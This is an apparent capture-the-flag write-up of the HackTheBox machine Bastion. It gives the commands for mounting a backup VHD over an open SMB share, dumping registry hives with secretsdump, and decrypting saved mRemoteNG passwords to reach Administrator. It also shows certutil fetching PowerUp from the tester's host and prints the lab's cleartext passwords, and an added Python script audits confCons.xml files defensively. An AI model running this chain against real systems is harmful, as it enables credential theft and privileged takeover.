Bastion (HackTheBox) (mRemoteNG)

Nmap scan brought back SMB, HTTPAPI 2.0 and Windows Server 2016.

To list SMB directories:

SMB login to ADMIN$, C$ and IPC$. Only IPC$ connects, and I can't seem to do much with it.

WHAT I MISSED:

You don't need to provide a password.

Connect to the Backups share:

smbclient \\\\10.10.10.134\\Backups

We see note.txt and get it. To view the note, open a new terminal and run:

cat note.txt

It doesn't let me cd into the backup folder.

What I did wrong:

I forgot the quotes around the folder name, which contains spaces.

cd "Backup 2019-02-22 124351"

Found VHD (virtual hard disk) files that are too big to transfer. We need to mount them over the share instead:

Resource: https://medium.com/@klockw3rk/mounting-vhd-file-on-kali-linux-through-remote-share-f2f9542c1f25

After doing the gets, make a folder called remote/backups under /mnt to use as the mount point.

To mount that remote share:

sudo mount -t cifs -o 'rw,username=guest' //10.10.10.134/Backups /mnt/remote/backups

cd into the mounted share:

cd /mnt/remote/backups

Go to the Bastion folder (this is where the VHD will be mounted):

cd /home/kali/Desktop/HackTheBox/Bastion

Mount the VHD read-only:

guestmount -a '/mnt/remote/backups/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd' -m /dev/sda1 --ro /home/kali/Desktop/HackTheBox/Bastion

Look for credentials or anything similar in the mounted folders and files.

Look for the SAM hive (and the SECURITY and SYSTEM hives next to it) in:

C:\Windows\System32\config

Grab:

SAM
SECURITY
SYSTEM

Copy them over to a working folder (the folder name has a space, so quote it):

cp SAM "/home/kali/Desktop/HackTheBox/Bastion SAM"
cp SECURITY "/home/kali/Desktop/HackTheBox/Bastion SAM"
cp SYSTEM "/home/kali/Desktop/HackTheBox/Bastion SAM"

Analyze them with secretsdump:

cd to the folder with the hives and run secretsdump against them locally:

cd /home/kali/Desktop/HackTheBox/"Bastion SAM"
secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL

It gives us a password for an unknown user. We can try logging into SSH with it:

ssh l4mpje@10.10.10.134
bureaulampje

Then pull enumeration scripts onto the box, e.g. PowerUp:

certutil -urlcache -f http://10.10.14.13/PowerUp.ps1 PowerUp.ps1

They all get blocked by antivirus. What programs are installed? Check the installation dates!

mRemoteNG? It has a known exploit.

Where is the config file stored?

Google:

  • mRemoteNG where are passwords stored

Generic path:
C:\Users\UserName\AppData\Roaming\mRemoteNG\confCons.xml

On this box:
C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml

Copy the XML file over and run the decrypt script on it:

cd /tmp/CVE-2023-30367 # tab-complete the path

Usage:

python3 mremoteng_decrypt.py -f bastionconfCon.txt

Running it against the whole file doesn't seem to work, but you can pass a single password string instead (here the Administrator password taken from the XML):

python3 mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="

Output:

Password: thXLHM96BeKL0ER2
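As an added example (not from the box or the mRemoteNG project), here is a defender-side audit that parses a confCons.xml like the one above and lists which connections have a saved password, flagging privileged account names; the sample XML, its placeholder blobs and the PRIVILEGED_USERS set are constructed assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed sample shaped like a confCons.xml; the Password/Protected
# values are placeholders, not real encrypted blobs from any box.
SAMPLE_CONFCONS = """<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections"
  Export="false" EncryptionEngine="AES" BlockCipherMode="GCM"
  KdfIterations="1000" FullFileEncryption="false"
  Protected="PLACEHOLDER" ConfVersion="2.6">
  <Node Name="DC" Type="Connection" Username="Administrator" Domain=""
    Password="PLACEHOLDER_1" Hostname="127.0.0.1" Protocol="RDP" Port="3389" />
  <Node Name="Servers" Type="Container" Username="" Password="">
    <Node Name="L4mpje-PC" Type="Connection" Username="L4mpje" Domain=""
      Password="PLACEHOLDER_2" Hostname="127.0.0.1" Protocol="RDP" Port="3389" />
    <Node Name="jump" Type="Connection" Username="" Domain=""
      Password="" Hostname="127.0.0.1" Protocol="SSH2" Port="22" />
  </Node>
</mrng:Connections>
"""

# Account names treated as privileged (assumption; extend for your estate).
PRIVILEGED_USERS = {"administrator", "admin", "root"}

def file_settings(root):
    """Crypto settings recorded on the root element of confCons.xml."""
    return {
        "engine": root.get("EncryptionEngine", ""),
        "mode": root.get("BlockCipherMode", ""),
        "kdf_iterations": int(root.get("KdfIterations") or 0),
        "full_file_encryption": root.get("FullFileEncryption", "false").lower() == "true",
    }

def inventory_saved_credentials(xml_text):
    """Return (settings, findings): one finding per Connection node that
    carries a saved password. Containers nest, so walk all descendants."""
    root = ET.fromstring(xml_text)
    findings = []
    for node in root.iter("Node"):
        if node.get("Type") != "Connection" or not node.get("Password"):
            continue  # skip containers and connections without a saved password
        user = node.get("Username", "")
        findings.append({
            "name": node.get("Name", ""),
            "username": user,
            "host": node.get("Hostname", ""),
            "protocol": node.get("Protocol", ""),
            "privileged": user.lower() in PRIVILEGED_USERS,
        })
    return file_settings(root), findings
```

Run it over each user's AppData\Roaming\mRemoteNG\confCons.xml to find saved credentials for privileged accounts left in ordinary user profiles.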

Log in as Administrator:

ssh Administrator@10.10.10.134
thXLHM96BeKL0ER2

The Papi/Server vuln seems to be privesc, not initial access.

DirBuster?

There are no web pages for DirBuster to find.

It seems to be a Samba/SMB exploit. How did he do it?